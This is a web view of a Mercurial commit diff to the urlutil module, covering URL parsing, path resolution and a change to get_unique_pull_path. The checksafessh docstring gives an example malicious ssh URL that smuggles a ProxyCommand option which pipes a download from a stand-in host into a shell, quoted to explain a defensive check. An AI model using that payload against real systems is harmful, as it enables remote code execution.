##// END OF EJS Templates
urlutil: remove usage of `ui.expandpath` in `get_unique_pull_path`...
marmoute -
r47725:0d8541e5 default
parent child Browse files
Show More
@@ -1,762 +1,776
1 # utils.urlutil - code related to [paths] management
1 # utils.urlutil - code related to [paths] management
2 #
2 #
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 import os
7 import os
8 import re as remod
8 import re as remod
9 import socket
9 import socket
10
10
11 from ..i18n import _
11 from ..i18n import _
12 from ..pycompat import (
12 from ..pycompat import (
13 getattr,
13 getattr,
14 setattr,
14 setattr,
15 )
15 )
16 from .. import (
16 from .. import (
17 encoding,
17 encoding,
18 error,
18 error,
19 pycompat,
19 pycompat,
20 urllibcompat,
20 urllibcompat,
21 )
21 )
22
22
23
23
24 if pycompat.TYPE_CHECKING:
24 if pycompat.TYPE_CHECKING:
25 from typing import (
25 from typing import (
26 Union,
26 Union,
27 )
27 )
28
28
29 urlreq = urllibcompat.urlreq
29 urlreq = urllibcompat.urlreq
30
30
31
31
32 def getport(port):
32 def getport(port):
33 # type: (Union[bytes, int]) -> int
33 # type: (Union[bytes, int]) -> int
34 """Return the port for a given network service.
34 """Return the port for a given network service.
35
35
36 If port is an integer, it's returned as is. If it's a string, it's
36 If port is an integer, it's returned as is. If it's a string, it's
37 looked up using socket.getservbyname(). If there's no matching
37 looked up using socket.getservbyname(). If there's no matching
38 service, error.Abort is raised.
38 service, error.Abort is raised.
39 """
39 """
40 try:
40 try:
41 return int(port)
41 return int(port)
42 except ValueError:
42 except ValueError:
43 pass
43 pass
44
44
45 try:
45 try:
46 return socket.getservbyname(pycompat.sysstr(port))
46 return socket.getservbyname(pycompat.sysstr(port))
47 except socket.error:
47 except socket.error:
48 raise error.Abort(
48 raise error.Abort(
49 _(b"no port number associated with service '%s'") % port
49 _(b"no port number associated with service '%s'") % port
50 )
50 )
51
51
52
52
53 class url(object):
53 class url(object):
54 r"""Reliable URL parser.
54 r"""Reliable URL parser.
55
55
56 This parses URLs and provides attributes for the following
56 This parses URLs and provides attributes for the following
57 components:
57 components:
58
58
59 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
59 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
60
60
61 Missing components are set to None. The only exception is
61 Missing components are set to None. The only exception is
62 fragment, which is set to '' if present but empty.
62 fragment, which is set to '' if present but empty.
63
63
64 If parsefragment is False, fragment is included in query. If
64 If parsefragment is False, fragment is included in query. If
65 parsequery is False, query is included in path. If both are
65 parsequery is False, query is included in path. If both are
66 False, both fragment and query are included in path.
66 False, both fragment and query are included in path.
67
67
68 See http://www.ietf.org/rfc/rfc2396.txt for more information.
68 See http://www.ietf.org/rfc/rfc2396.txt for more information.
69
69
70 Note that for backward compatibility reasons, bundle URLs do not
70 Note that for backward compatibility reasons, bundle URLs do not
71 take host names. That means 'bundle://../' has a path of '../'.
71 take host names. That means 'bundle://../' has a path of '../'.
72
72
73 Examples:
73 Examples:
74
74
75 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
75 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
76 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
76 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
77 >>> url(b'ssh://[::1]:2200//home/joe/repo')
77 >>> url(b'ssh://[::1]:2200//home/joe/repo')
78 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
78 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
79 >>> url(b'file:///home/joe/repo')
79 >>> url(b'file:///home/joe/repo')
80 <url scheme: 'file', path: '/home/joe/repo'>
80 <url scheme: 'file', path: '/home/joe/repo'>
81 >>> url(b'file:///c:/temp/foo/')
81 >>> url(b'file:///c:/temp/foo/')
82 <url scheme: 'file', path: 'c:/temp/foo/'>
82 <url scheme: 'file', path: 'c:/temp/foo/'>
83 >>> url(b'bundle:foo')
83 >>> url(b'bundle:foo')
84 <url scheme: 'bundle', path: 'foo'>
84 <url scheme: 'bundle', path: 'foo'>
85 >>> url(b'bundle://../foo')
85 >>> url(b'bundle://../foo')
86 <url scheme: 'bundle', path: '../foo'>
86 <url scheme: 'bundle', path: '../foo'>
87 >>> url(br'c:\foo\bar')
87 >>> url(br'c:\foo\bar')
88 <url path: 'c:\\foo\\bar'>
88 <url path: 'c:\\foo\\bar'>
89 >>> url(br'\\blah\blah\blah')
89 >>> url(br'\\blah\blah\blah')
90 <url path: '\\\\blah\\blah\\blah'>
90 <url path: '\\\\blah\\blah\\blah'>
91 >>> url(br'\\blah\blah\blah#baz')
91 >>> url(br'\\blah\blah\blah#baz')
92 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
92 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
93 >>> url(br'file:///C:\users\me')
93 >>> url(br'file:///C:\users\me')
94 <url scheme: 'file', path: 'C:\\users\\me'>
94 <url scheme: 'file', path: 'C:\\users\\me'>
95
95
96 Authentication credentials:
96 Authentication credentials:
97
97
98 >>> url(b'ssh://joe:xyz@x/repo')
98 >>> url(b'ssh://joe:xyz@x/repo')
99 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
99 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
100 >>> url(b'ssh://joe@x/repo')
100 >>> url(b'ssh://joe@x/repo')
101 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
101 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
102
102
103 Query strings and fragments:
103 Query strings and fragments:
104
104
105 >>> url(b'http://host/a?b#c')
105 >>> url(b'http://host/a?b#c')
106 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
106 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
107 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
107 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
108 <url scheme: 'http', host: 'host', path: 'a?b#c'>
108 <url scheme: 'http', host: 'host', path: 'a?b#c'>
109
109
110 Empty path:
110 Empty path:
111
111
112 >>> url(b'')
112 >>> url(b'')
113 <url path: ''>
113 <url path: ''>
114 >>> url(b'#a')
114 >>> url(b'#a')
115 <url path: '', fragment: 'a'>
115 <url path: '', fragment: 'a'>
116 >>> url(b'http://host/')
116 >>> url(b'http://host/')
117 <url scheme: 'http', host: 'host', path: ''>
117 <url scheme: 'http', host: 'host', path: ''>
118 >>> url(b'http://host/#a')
118 >>> url(b'http://host/#a')
119 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
119 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
120
120
121 Only scheme:
121 Only scheme:
122
122
123 >>> url(b'http:')
123 >>> url(b'http:')
124 <url scheme: 'http'>
124 <url scheme: 'http'>
125 """
125 """
126
126
127 _safechars = b"!~*'()+"
127 _safechars = b"!~*'()+"
128 _safepchars = b"/!~*'()+:\\"
128 _safepchars = b"/!~*'()+:\\"
129 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
129 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
130
130
131 def __init__(self, path, parsequery=True, parsefragment=True):
131 def __init__(self, path, parsequery=True, parsefragment=True):
132 # type: (bytes, bool, bool) -> None
132 # type: (bytes, bool, bool) -> None
133 # We slowly chomp away at path until we have only the path left
133 # We slowly chomp away at path until we have only the path left
134 self.scheme = self.user = self.passwd = self.host = None
134 self.scheme = self.user = self.passwd = self.host = None
135 self.port = self.path = self.query = self.fragment = None
135 self.port = self.path = self.query = self.fragment = None
136 self._localpath = True
136 self._localpath = True
137 self._hostport = b''
137 self._hostport = b''
138 self._origpath = path
138 self._origpath = path
139
139
140 if parsefragment and b'#' in path:
140 if parsefragment and b'#' in path:
141 path, self.fragment = path.split(b'#', 1)
141 path, self.fragment = path.split(b'#', 1)
142
142
143 # special case for Windows drive letters and UNC paths
143 # special case for Windows drive letters and UNC paths
144 if hasdriveletter(path) or path.startswith(b'\\\\'):
144 if hasdriveletter(path) or path.startswith(b'\\\\'):
145 self.path = path
145 self.path = path
146 return
146 return
147
147
148 # For compatibility reasons, we can't handle bundle paths as
148 # For compatibility reasons, we can't handle bundle paths as
149 # normal URLS
149 # normal URLS
150 if path.startswith(b'bundle:'):
150 if path.startswith(b'bundle:'):
151 self.scheme = b'bundle'
151 self.scheme = b'bundle'
152 path = path[7:]
152 path = path[7:]
153 if path.startswith(b'//'):
153 if path.startswith(b'//'):
154 path = path[2:]
154 path = path[2:]
155 self.path = path
155 self.path = path
156 return
156 return
157
157
158 if self._matchscheme(path):
158 if self._matchscheme(path):
159 parts = path.split(b':', 1)
159 parts = path.split(b':', 1)
160 if parts[0]:
160 if parts[0]:
161 self.scheme, path = parts
161 self.scheme, path = parts
162 self._localpath = False
162 self._localpath = False
163
163
164 if not path:
164 if not path:
165 path = None
165 path = None
166 if self._localpath:
166 if self._localpath:
167 self.path = b''
167 self.path = b''
168 return
168 return
169 else:
169 else:
170 if self._localpath:
170 if self._localpath:
171 self.path = path
171 self.path = path
172 return
172 return
173
173
174 if parsequery and b'?' in path:
174 if parsequery and b'?' in path:
175 path, self.query = path.split(b'?', 1)
175 path, self.query = path.split(b'?', 1)
176 if not path:
176 if not path:
177 path = None
177 path = None
178 if not self.query:
178 if not self.query:
179 self.query = None
179 self.query = None
180
180
181 # // is required to specify a host/authority
181 # // is required to specify a host/authority
182 if path and path.startswith(b'//'):
182 if path and path.startswith(b'//'):
183 parts = path[2:].split(b'/', 1)
183 parts = path[2:].split(b'/', 1)
184 if len(parts) > 1:
184 if len(parts) > 1:
185 self.host, path = parts
185 self.host, path = parts
186 else:
186 else:
187 self.host = parts[0]
187 self.host = parts[0]
188 path = None
188 path = None
189 if not self.host:
189 if not self.host:
190 self.host = None
190 self.host = None
191 # path of file:///d is /d
191 # path of file:///d is /d
192 # path of file:///d:/ is d:/, not /d:/
192 # path of file:///d:/ is d:/, not /d:/
193 if path and not hasdriveletter(path):
193 if path and not hasdriveletter(path):
194 path = b'/' + path
194 path = b'/' + path
195
195
196 if self.host and b'@' in self.host:
196 if self.host and b'@' in self.host:
197 self.user, self.host = self.host.rsplit(b'@', 1)
197 self.user, self.host = self.host.rsplit(b'@', 1)
198 if b':' in self.user:
198 if b':' in self.user:
199 self.user, self.passwd = self.user.split(b':', 1)
199 self.user, self.passwd = self.user.split(b':', 1)
200 if not self.host:
200 if not self.host:
201 self.host = None
201 self.host = None
202
202
203 # Don't split on colons in IPv6 addresses without ports
203 # Don't split on colons in IPv6 addresses without ports
204 if (
204 if (
205 self.host
205 self.host
206 and b':' in self.host
206 and b':' in self.host
207 and not (
207 and not (
208 self.host.startswith(b'[') and self.host.endswith(b']')
208 self.host.startswith(b'[') and self.host.endswith(b']')
209 )
209 )
210 ):
210 ):
211 self._hostport = self.host
211 self._hostport = self.host
212 self.host, self.port = self.host.rsplit(b':', 1)
212 self.host, self.port = self.host.rsplit(b':', 1)
213 if not self.host:
213 if not self.host:
214 self.host = None
214 self.host = None
215
215
216 if (
216 if (
217 self.host
217 self.host
218 and self.scheme == b'file'
218 and self.scheme == b'file'
219 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
219 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
220 ):
220 ):
221 raise error.Abort(
221 raise error.Abort(
222 _(b'file:// URLs can only refer to localhost')
222 _(b'file:// URLs can only refer to localhost')
223 )
223 )
224
224
225 self.path = path
225 self.path = path
226
226
227 # leave the query string escaped
227 # leave the query string escaped
228 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
228 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
229 v = getattr(self, a)
229 v = getattr(self, a)
230 if v is not None:
230 if v is not None:
231 setattr(self, a, urlreq.unquote(v))
231 setattr(self, a, urlreq.unquote(v))
232
232
233 def copy(self):
233 def copy(self):
234 u = url(b'temporary useless value')
234 u = url(b'temporary useless value')
235 u.path = self.path
235 u.path = self.path
236 u.scheme = self.scheme
236 u.scheme = self.scheme
237 u.user = self.user
237 u.user = self.user
238 u.passwd = self.passwd
238 u.passwd = self.passwd
239 u.host = self.host
239 u.host = self.host
240 u.path = self.path
240 u.path = self.path
241 u.query = self.query
241 u.query = self.query
242 u.fragment = self.fragment
242 u.fragment = self.fragment
243 u._localpath = self._localpath
243 u._localpath = self._localpath
244 u._hostport = self._hostport
244 u._hostport = self._hostport
245 u._origpath = self._origpath
245 u._origpath = self._origpath
246 return u
246 return u
247
247
248 @encoding.strmethod
248 @encoding.strmethod
249 def __repr__(self):
249 def __repr__(self):
250 attrs = []
250 attrs = []
251 for a in (
251 for a in (
252 b'scheme',
252 b'scheme',
253 b'user',
253 b'user',
254 b'passwd',
254 b'passwd',
255 b'host',
255 b'host',
256 b'port',
256 b'port',
257 b'path',
257 b'path',
258 b'query',
258 b'query',
259 b'fragment',
259 b'fragment',
260 ):
260 ):
261 v = getattr(self, a)
261 v = getattr(self, a)
262 if v is not None:
262 if v is not None:
263 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
263 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
264 return b'<url %s>' % b', '.join(attrs)
264 return b'<url %s>' % b', '.join(attrs)
265
265
266 def __bytes__(self):
266 def __bytes__(self):
267 r"""Join the URL's components back into a URL string.
267 r"""Join the URL's components back into a URL string.
268
268
269 Examples:
269 Examples:
270
270
271 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
271 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
272 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
272 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
273 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
273 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
274 'http://user:pw@host:80/?foo=bar&baz=42'
274 'http://user:pw@host:80/?foo=bar&baz=42'
275 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
275 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
276 'http://user:pw@host:80/?foo=bar%3dbaz'
276 'http://user:pw@host:80/?foo=bar%3dbaz'
277 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
277 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
278 'ssh://user:pw@[::1]:2200//home/joe#'
278 'ssh://user:pw@[::1]:2200//home/joe#'
279 >>> bytes(url(b'http://localhost:80//'))
279 >>> bytes(url(b'http://localhost:80//'))
280 'http://localhost:80//'
280 'http://localhost:80//'
281 >>> bytes(url(b'http://localhost:80/'))
281 >>> bytes(url(b'http://localhost:80/'))
282 'http://localhost:80/'
282 'http://localhost:80/'
283 >>> bytes(url(b'http://localhost:80'))
283 >>> bytes(url(b'http://localhost:80'))
284 'http://localhost:80/'
284 'http://localhost:80/'
285 >>> bytes(url(b'bundle:foo'))
285 >>> bytes(url(b'bundle:foo'))
286 'bundle:foo'
286 'bundle:foo'
287 >>> bytes(url(b'bundle://../foo'))
287 >>> bytes(url(b'bundle://../foo'))
288 'bundle:../foo'
288 'bundle:../foo'
289 >>> bytes(url(b'path'))
289 >>> bytes(url(b'path'))
290 'path'
290 'path'
291 >>> bytes(url(b'file:///tmp/foo/bar'))
291 >>> bytes(url(b'file:///tmp/foo/bar'))
292 'file:///tmp/foo/bar'
292 'file:///tmp/foo/bar'
293 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
293 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
294 'file:///c:/tmp/foo/bar'
294 'file:///c:/tmp/foo/bar'
295 >>> print(url(br'bundle:foo\bar'))
295 >>> print(url(br'bundle:foo\bar'))
296 bundle:foo\bar
296 bundle:foo\bar
297 >>> print(url(br'file:///D:\data\hg'))
297 >>> print(url(br'file:///D:\data\hg'))
298 file:///D:\data\hg
298 file:///D:\data\hg
299 """
299 """
300 if self._localpath:
300 if self._localpath:
301 s = self.path
301 s = self.path
302 if self.scheme == b'bundle':
302 if self.scheme == b'bundle':
303 s = b'bundle:' + s
303 s = b'bundle:' + s
304 if self.fragment:
304 if self.fragment:
305 s += b'#' + self.fragment
305 s += b'#' + self.fragment
306 return s
306 return s
307
307
308 s = self.scheme + b':'
308 s = self.scheme + b':'
309 if self.user or self.passwd or self.host:
309 if self.user or self.passwd or self.host:
310 s += b'//'
310 s += b'//'
311 elif self.scheme and (
311 elif self.scheme and (
312 not self.path
312 not self.path
313 or self.path.startswith(b'/')
313 or self.path.startswith(b'/')
314 or hasdriveletter(self.path)
314 or hasdriveletter(self.path)
315 ):
315 ):
316 s += b'//'
316 s += b'//'
317 if hasdriveletter(self.path):
317 if hasdriveletter(self.path):
318 s += b'/'
318 s += b'/'
319 if self.user:
319 if self.user:
320 s += urlreq.quote(self.user, safe=self._safechars)
320 s += urlreq.quote(self.user, safe=self._safechars)
321 if self.passwd:
321 if self.passwd:
322 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
322 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
323 if self.user or self.passwd:
323 if self.user or self.passwd:
324 s += b'@'
324 s += b'@'
325 if self.host:
325 if self.host:
326 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
326 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
327 s += urlreq.quote(self.host)
327 s += urlreq.quote(self.host)
328 else:
328 else:
329 s += self.host
329 s += self.host
330 if self.port:
330 if self.port:
331 s += b':' + urlreq.quote(self.port)
331 s += b':' + urlreq.quote(self.port)
332 if self.host:
332 if self.host:
333 s += b'/'
333 s += b'/'
334 if self.path:
334 if self.path:
335 # TODO: similar to the query string, we should not unescape the
335 # TODO: similar to the query string, we should not unescape the
336 # path when we store it, the path might contain '%2f' = '/',
336 # path when we store it, the path might contain '%2f' = '/',
337 # which we should *not* escape.
337 # which we should *not* escape.
338 s += urlreq.quote(self.path, safe=self._safepchars)
338 s += urlreq.quote(self.path, safe=self._safepchars)
339 if self.query:
339 if self.query:
340 # we store the query in escaped form.
340 # we store the query in escaped form.
341 s += b'?' + self.query
341 s += b'?' + self.query
342 if self.fragment is not None:
342 if self.fragment is not None:
343 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
343 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
344 return s
344 return s
345
345
346 __str__ = encoding.strmethod(__bytes__)
346 __str__ = encoding.strmethod(__bytes__)
347
347
348 def authinfo(self):
348 def authinfo(self):
349 user, passwd = self.user, self.passwd
349 user, passwd = self.user, self.passwd
350 try:
350 try:
351 self.user, self.passwd = None, None
351 self.user, self.passwd = None, None
352 s = bytes(self)
352 s = bytes(self)
353 finally:
353 finally:
354 self.user, self.passwd = user, passwd
354 self.user, self.passwd = user, passwd
355 if not self.user:
355 if not self.user:
356 return (s, None)
356 return (s, None)
357 # authinfo[1] is passed to urllib2 password manager, and its
357 # authinfo[1] is passed to urllib2 password manager, and its
358 # URIs must not contain credentials. The host is passed in the
358 # URIs must not contain credentials. The host is passed in the
359 # URIs list because Python < 2.4.3 uses only that to search for
359 # URIs list because Python < 2.4.3 uses only that to search for
360 # a password.
360 # a password.
361 return (s, (None, (s, self.host), self.user, self.passwd or b''))
361 return (s, (None, (s, self.host), self.user, self.passwd or b''))
362
362
363 def isabs(self):
363 def isabs(self):
364 if self.scheme and self.scheme != b'file':
364 if self.scheme and self.scheme != b'file':
365 return True # remote URL
365 return True # remote URL
366 if hasdriveletter(self.path):
366 if hasdriveletter(self.path):
367 return True # absolute for our purposes - can't be joined()
367 return True # absolute for our purposes - can't be joined()
368 if self.path.startswith(br'\\'):
368 if self.path.startswith(br'\\'):
369 return True # Windows UNC path
369 return True # Windows UNC path
370 if self.path.startswith(b'/'):
370 if self.path.startswith(b'/'):
371 return True # POSIX-style
371 return True # POSIX-style
372 return False
372 return False
373
373
374 def localpath(self):
374 def localpath(self):
375 # type: () -> bytes
375 # type: () -> bytes
376 if self.scheme == b'file' or self.scheme == b'bundle':
376 if self.scheme == b'file' or self.scheme == b'bundle':
377 path = self.path or b'/'
377 path = self.path or b'/'
378 # For Windows, we need to promote hosts containing drive
378 # For Windows, we need to promote hosts containing drive
379 # letters to paths with drive letters.
379 # letters to paths with drive letters.
380 if hasdriveletter(self._hostport):
380 if hasdriveletter(self._hostport):
381 path = self._hostport + b'/' + self.path
381 path = self._hostport + b'/' + self.path
382 elif (
382 elif (
383 self.host is not None and self.path and not hasdriveletter(path)
383 self.host is not None and self.path and not hasdriveletter(path)
384 ):
384 ):
385 path = b'/' + path
385 path = b'/' + path
386 return path
386 return path
387 return self._origpath
387 return self._origpath
388
388
389 def islocal(self):
389 def islocal(self):
390 '''whether localpath will return something that posixfile can open'''
390 '''whether localpath will return something that posixfile can open'''
391 return (
391 return (
392 not self.scheme
392 not self.scheme
393 or self.scheme == b'file'
393 or self.scheme == b'file'
394 or self.scheme == b'bundle'
394 or self.scheme == b'bundle'
395 )
395 )
396
396
397
397
398 def hasscheme(path):
398 def hasscheme(path):
399 # type: (bytes) -> bool
399 # type: (bytes) -> bool
400 return bool(url(path).scheme) # cast to help pytype
400 return bool(url(path).scheme) # cast to help pytype
401
401
402
402
403 def hasdriveletter(path):
403 def hasdriveletter(path):
404 # type: (bytes) -> bool
404 # type: (bytes) -> bool
405 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
405 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
406
406
407
407
408 def urllocalpath(path):
408 def urllocalpath(path):
409 # type: (bytes) -> bytes
409 # type: (bytes) -> bytes
410 return url(path, parsequery=False, parsefragment=False).localpath()
410 return url(path, parsequery=False, parsefragment=False).localpath()
411
411
412
412
413 def checksafessh(path):
413 def checksafessh(path):
414 # type: (bytes) -> None
414 # type: (bytes) -> None
415 """check if a path / url is a potentially unsafe ssh exploit (SEC)
415 """check if a path / url is a potentially unsafe ssh exploit (SEC)
416
416
417 This is a sanity check for ssh urls. ssh will parse the first item as
417 This is a sanity check for ssh urls. ssh will parse the first item as
418 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
418 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
419 Let's prevent these potentially exploited urls entirely and warn the
419 Let's prevent these potentially exploited urls entirely and warn the
420 user.
420 user.
421
421
422 Raises an error.Abort when the url is unsafe.
422 Raises an error.Abort when the url is unsafe.
423 """
423 """
424 path = urlreq.unquote(path)
424 path = urlreq.unquote(path)
425 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
425 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
426 raise error.Abort(
426 raise error.Abort(
427 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
427 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
428 )
428 )
429
429
430
430
431 def hidepassword(u):
431 def hidepassword(u):
432 # type: (bytes) -> bytes
432 # type: (bytes) -> bytes
433 '''hide user credential in a url string'''
433 '''hide user credential in a url string'''
434 u = url(u)
434 u = url(u)
435 if u.passwd:
435 if u.passwd:
436 u.passwd = b'***'
436 u.passwd = b'***'
437 return bytes(u)
437 return bytes(u)
438
438
439
439
440 def removeauth(u):
440 def removeauth(u):
441 # type: (bytes) -> bytes
441 # type: (bytes) -> bytes
442 '''remove all authentication information from a url string'''
442 '''remove all authentication information from a url string'''
443 u = url(u)
443 u = url(u)
444 u.user = u.passwd = None
444 u.user = u.passwd = None
445 return bytes(u)
445 return bytes(u)
446
446
447
447
448 def get_push_paths(repo, ui, dests):
448 def get_push_paths(repo, ui, dests):
449 """yields all the `path` selected as push destination by `dests`"""
449 """yields all the `path` selected as push destination by `dests`"""
450 if not dests:
450 if not dests:
451 if b'default-push' in ui.paths:
451 if b'default-push' in ui.paths:
452 yield ui.paths[b'default-push']
452 yield ui.paths[b'default-push']
453 elif b'default' in ui.paths:
453 elif b'default' in ui.paths:
454 yield ui.paths[b'default']
454 yield ui.paths[b'default']
455 else:
455 else:
456 raise error.ConfigError(
456 raise error.ConfigError(
457 _(b'default repository not configured!'),
457 _(b'default repository not configured!'),
458 hint=_(b"see 'hg help config.paths'"),
458 hint=_(b"see 'hg help config.paths'"),
459 )
459 )
460 else:
460 else:
461 for dest in dests:
461 for dest in dests:
462 yield ui.getpath(dest)
462 yield ui.getpath(dest)
463
463
464
464
465 def get_pull_paths(repo, ui, sources, default_branches=()):
465 def get_pull_paths(repo, ui, sources, default_branches=()):
466 """yields all the `(path, branch)` selected as pull source by `sources`"""
466 """yields all the `(path, branch)` selected as pull source by `sources`"""
467 if not sources:
467 if not sources:
468 sources = [b'default']
468 sources = [b'default']
469 for source in sources:
469 for source in sources:
470 if source in ui.paths:
470 if source in ui.paths:
471 url = ui.paths[source].rawloc
471 url = ui.paths[source].rawloc
472 else:
472 else:
473 # Try to resolve as a local path or URI.
473 # Try to resolve as a local path or URI.
474 try:
474 try:
475 # we pass the ui instance are warning might need to be issued
475 # we pass the ui instance are warning might need to be issued
476 url = path(ui, None, rawloc=source).rawloc
476 url = path(ui, None, rawloc=source).rawloc
477 except ValueError:
477 except ValueError:
478 url = source
478 url = source
479 yield parseurl(url, default_branches)
479 yield parseurl(url, default_branches)
480
480
481
481
482 def get_unique_push_path(action, repo, ui, dest=None):
482 def get_unique_push_path(action, repo, ui, dest=None):
483 """return a unique `path` or abort if multiple are found
483 """return a unique `path` or abort if multiple are found
484
484
485 This is useful for command and action that does not support multiple
485 This is useful for command and action that does not support multiple
486 destination (yet).
486 destination (yet).
487
487
488 Note that for now, we cannot get multiple destination so this function is "trivial".
488 Note that for now, we cannot get multiple destination so this function is "trivial".
489
489
490 The `action` parameter will be used for the error message.
490 The `action` parameter will be used for the error message.
491 """
491 """
492 if dest is None:
492 if dest is None:
493 dests = []
493 dests = []
494 else:
494 else:
495 dests = [dest]
495 dests = [dest]
496 dests = list(get_push_paths(repo, ui, dests))
496 dests = list(get_push_paths(repo, ui, dests))
497 assert len(dests) == 1
497 assert len(dests) == 1
498 return dests[0]
498 return dests[0]
499
499
500
500
501 def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
501 def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
502 """return a unique `(path, branch)` or abort if multiple are found
502 """return a unique `(path, branch)` or abort if multiple are found
503
503
504 This is useful for command and action that does not support multiple
504 This is useful for command and action that does not support multiple
505 destination (yet).
505 destination (yet).
506
506
507 Note that for now, we cannot get multiple destination so this function is "trivial".
507 Note that for now, we cannot get multiple destination so this function is "trivial".
508
508
509 The `action` parameter will be used for the error message.
509 The `action` parameter will be used for the error message.
510 """
510 """
511 if source is None:
511 if source is None:
512 source = b'default'
512 if b'default' in ui.paths:
513 url = ui.expandpath(source)
513 url = ui.paths[b'default'].rawloc
514 else:
515 # XXX this is the historical default behavior, but that is not
516 # great, consider breaking BC on this.
517 url = b'default'
518 else:
519 if source in ui.paths:
520 url = ui.paths[source].rawloc
521 else:
522 # Try to resolve as a local path or URI.
523 try:
524 # we pass the ui instance are warning might need to be issued
525 url = path(ui, None, rawloc=source).rawloc
526 except ValueError:
527 url = source
514 return parseurl(url, default_branches)
528 return parseurl(url, default_branches)
515
529
516
530
517 def get_clone_path(ui, source, default_branches=()):
531 def get_clone_path(ui, source, default_branches=()):
518 """return the `(origsource, path, branch)` selected as clone source"""
532 """return the `(origsource, path, branch)` selected as clone source"""
519 url = ui.expandpath(source)
533 url = ui.expandpath(source)
520 path, branch = parseurl(url, default_branches)
534 path, branch = parseurl(url, default_branches)
521 return url, path, branch
535 return url, path, branch
522
536
523
537
524 def parseurl(path, branches=None):
538 def parseurl(path, branches=None):
525 '''parse url#branch, returning (url, (branch, branches))'''
539 '''parse url#branch, returning (url, (branch, branches))'''
526 u = url(path)
540 u = url(path)
527 branch = None
541 branch = None
528 if u.fragment:
542 if u.fragment:
529 branch = u.fragment
543 branch = u.fragment
530 u.fragment = None
544 u.fragment = None
531 return bytes(u), (branch, branches or [])
545 return bytes(u), (branch, branches or [])
532
546
533
547
534 class paths(dict):
548 class paths(dict):
535 """Represents a collection of paths and their configs.
549 """Represents a collection of paths and their configs.
536
550
537 Data is initially derived from ui instances and the config files they have
551 Data is initially derived from ui instances and the config files they have
538 loaded.
552 loaded.
539 """
553 """
540
554
541 def __init__(self, ui):
555 def __init__(self, ui):
542 dict.__init__(self)
556 dict.__init__(self)
543
557
544 for name, loc in ui.configitems(b'paths', ignoresub=True):
558 for name, loc in ui.configitems(b'paths', ignoresub=True):
545 # No location is the same as not existing.
559 # No location is the same as not existing.
546 if not loc:
560 if not loc:
547 continue
561 continue
548 loc, sub_opts = ui.configsuboptions(b'paths', name)
562 loc, sub_opts = ui.configsuboptions(b'paths', name)
549 self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
563 self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
550
564
551 for name, p in sorted(self.items()):
565 for name, p in sorted(self.items()):
552 p.chain_path(ui, self)
566 p.chain_path(ui, self)
553
567
554 def getpath(self, ui, name, default=None):
568 def getpath(self, ui, name, default=None):
555 """Return a ``path`` from a string, falling back to default.
569 """Return a ``path`` from a string, falling back to default.
556
570
557 ``name`` can be a named path or locations. Locations are filesystem
